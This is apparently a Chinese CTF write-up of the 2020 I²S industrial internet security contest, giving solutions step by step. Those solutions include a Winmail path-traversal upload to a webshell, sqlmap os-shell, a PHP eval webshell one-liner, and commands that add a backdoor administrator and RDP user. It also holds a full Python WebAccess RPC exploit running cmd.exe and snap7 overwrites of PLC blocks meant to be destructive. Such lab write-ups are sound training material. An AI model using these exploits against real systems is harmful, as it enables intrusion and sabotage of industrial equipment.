2020 11 I²S峰会暨工业互联网安全大赛

签到 1

查看流量包, 过滤 modbus 协议, 一个一个翻，发现 flag

签到 2

notepad++ 打开, 直接搜 s7comm, 一个一个 IP 提交试过去, 发现 flag IP

email

在 F12 源码中发现目标是 winmail 6.1，这个版本存在一个普通用户上传 getshell 的漏洞

并且在 F12 源码中发现测试账号

登录系统后上传文件保存到网盘，并抓取数据包

通过修改 ftpfolder 值为 “Ly4uLy4uL3dlYm1haWwvd3d3Lw==” 代表 “/../../webmail/www/”

访问 http://10.100.101.8:8080/shell.php 即可获取webshell,在 administrator 目录下发现 flag

web

搜索框注入

sqlmap 直接拿 os-shell

python3.exe sqlmap.py -r e:\c.txt --os-shell

输入 cmd 命令生成 webshell

echo ^<?php eval($_POST["shell"]); ?^> >1.php

蚁剑连接 1.php, 上 cs 提权

net user a Abcd1234 /add
net localgroup administrators a /add
net localgroup "Remote Desktop Users" a /add

输入上面的命令生成 rdp 用户

修改 admin 用户密码，rdp 登录，一样的步骤如果找不到可以上传一个 everything 搜索 flag.txt

oa

存在一个通达 OA 任意用户登录漏洞，用 poc 直接打可以进后台

通过通达 OA 任意文件上传漏洞，本地文件包含漏洞

成功拿 shell, 加用户

net user a Abcd1234 /add
net localgroup administrators a /add
net localgroup "Remote Desktop Users" a /add

rdp 连接 a 用户，打开用户管理，修改 administrator 用户密码，rdp 登录用户到回收站里拖 flag 文件到桌面即可

mes

这题我们 RDP 在 web 的机器上做的，扫描后面的一个 C 段，发现 mes 的 IP 地址, 然后根据提示用 webaccess 的溢出漏洞打

#!/usr/bin/python2.7

import sys, struct
from impacket import uuid
from impacket.dcerpc.v5 import transport

def call(dce, opcode, stubdata):
  dce.call(opcode, stubdata)
  res = -1
  try:
    res = dce.recv()
  except Exception, e:
    print "Exception encountered..." + str(e)
    sys.exit(1)
  return res

if len(sys.argv) != 2:
  print "Provide only host arg"
  sys.exit(1)

port = 4592
interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
version = "1.0"

host = sys.argv[1]

string_binding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(string_binding)
trans.set_dport(port)

dce = trans.get_dce_rpc()
dce.connect()

print "Binding..."
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)

print "...1"
stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
call(dce, 2, stubdata)

print "...2"
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
  print "Something went wrong"
  sys.exit(1)
res = struct.unpack("III", res)

if (len(res) < 3):
  print "Received unexpected length value"
  sys.exit(1)

print "...3"
# ioctl 0x2711
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
command = "..\\..\\windows\\system32\\cmd.exe /c 命令"
#net user a Abcd1234 /add
#net localgroup administrators a /add
#net localgroup "Remote Desktop Users" a /add

fmt = "<" + str(0x204) + "s"
stubdata += struct.pack(fmt, command)
call(dce, 1, stubdata)

print "\nDid it work?"

dce.disconnect()

rdp 连接 a 然后改密码和上面的几题 web 一样用 everything 找 flag.txt, 但找出来的不对，后来发现桌面壁纸是个 base64，解一下得到 flag

ics3

拿下 mes 这台后,他桌面上有个 rdp 的密码文件，直接上 goby 扫C段，发现 mes 同C段后面一位的机器开着 3389，直接连接

连接后 netstat -ano 查看主机连接，发现该主机连接另一台主机的 8080 口

访问发现是 openplc 管理页面，默认口令就是 openplc openplc

上传 st 文件后，在用户那边看到有个 openplc@openplc.com ，尝试提交，成功

附加题1

RDP 扫描弱口令直接连接

上去后有 web 的账号密码，goby 扫一下 web 就有防火墙的地址了，上去关掉策略就行

附加题2

从流量包题分析出 S7-200 机器为 192.168.1.3 直接用 snap7 工具连接，要slot选择为1

附加题3

用 snap7 工具连接 192.168.1.3 后，直接通过 DB FILL 覆写所有区块，达到破坏性效果

附加题4

用 snap7 工具连接 192.168.1.3 后，直接通过 DB FILL 覆写所有区块，达到破坏性效果

附加题5

这个我猜测和 3、4 解法一样，只是可惜现场没时间了。

Previous2020 10 全国网络与信息安全管理职业技能大赛江苏场 Next2021 6 第二届I²S峰会暨工业互联网安全大赛